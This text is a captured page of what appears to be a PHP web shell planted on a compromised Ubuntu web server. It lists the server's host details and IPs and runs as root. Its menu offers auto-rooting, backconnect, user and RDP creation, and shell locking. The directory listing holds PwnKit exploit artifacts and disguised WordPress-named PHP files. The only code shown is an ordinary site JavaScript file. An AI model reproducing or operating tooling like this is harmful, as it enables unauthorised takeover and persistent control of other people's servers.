Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
armado
1.28
KB
-rwxrwxrwx
armado.js
1.29
KB
-rwxrwxrwx
cuadro-perfil.js
235
B
-rwxrwxrwx
footer-index.js
9.72
KB
-rwxrwxrwx
footer.js
11.93
KB
-rwxrwxrwx
header-index.js
19.98
KB
-rwxrwxrwx
header.js
20.08
KB
-rwxrwxrwx
master.js
210.79
KB
-rwxrwxrwx
master.min.js
132.36
KB
-rwxrwxrwx
polyfills.js
14.62
KB
-rwxrwxrwx
polyfills.min.js
9.84
KB
-rwxrwxrwx
popup.js
288
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
vendor.js
144.83
KB
-rwxrwxrwx
vendor.min.js
87.55
KB
-rwxrwxrwx
wp-blog-header.php
2.74
KB
-r--r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : armado
//Boton flotante document.addEventListener('DOMContentLoaded', ()=> { const imagenHero = document.querySelector('.hero'); //Inicializar las variables let i = 0; let tiempo = 0; //Arreglo con imagenes de fondo const imagenes = ['https://purewows3.imgix.net/images/articles/2017_04/los_angeles_airbnb_tips_1.jpg', 'https://d1u5p3l4wpay3k.cloudfront.net/zelda_gamepedia_en/thumb/b/bd/BotW_Hyrule_Castle_Close_Up.png/1200px-BotW_Hyrule_Castle_Close_Up.png']; setInterval(() => { imagenHero.style.backgroundPositionX = '-' + tiempo + 'px'; if(tiempo > 40) { tiempo = 0; imagenHero.style.backgroundImage = "url(" + imagenes[i] + ")"; if (i === imagenes.length - 1) { i = 0; } else { i++; } } tiempo ++; }, 100) const btnFlotante = document.querySelector('.btn-flotante'); btnFlotante.addEventListener('click', (e) => { e.preventDefault(); //alert('funcion'); const armado = document.querySelector('#armado'); if(armado.classList.contains('activo')) { armado.classList.remove('activo') btnFlotante.classList.remove('activo'); btnFlotante.innerText = 'Idioma y Moneda'; } else { armado.classList.add('activo'); btnFlotante.classList.add('activo'); btnFlotante.innerText = 'X Cerrar'; } }) });
Close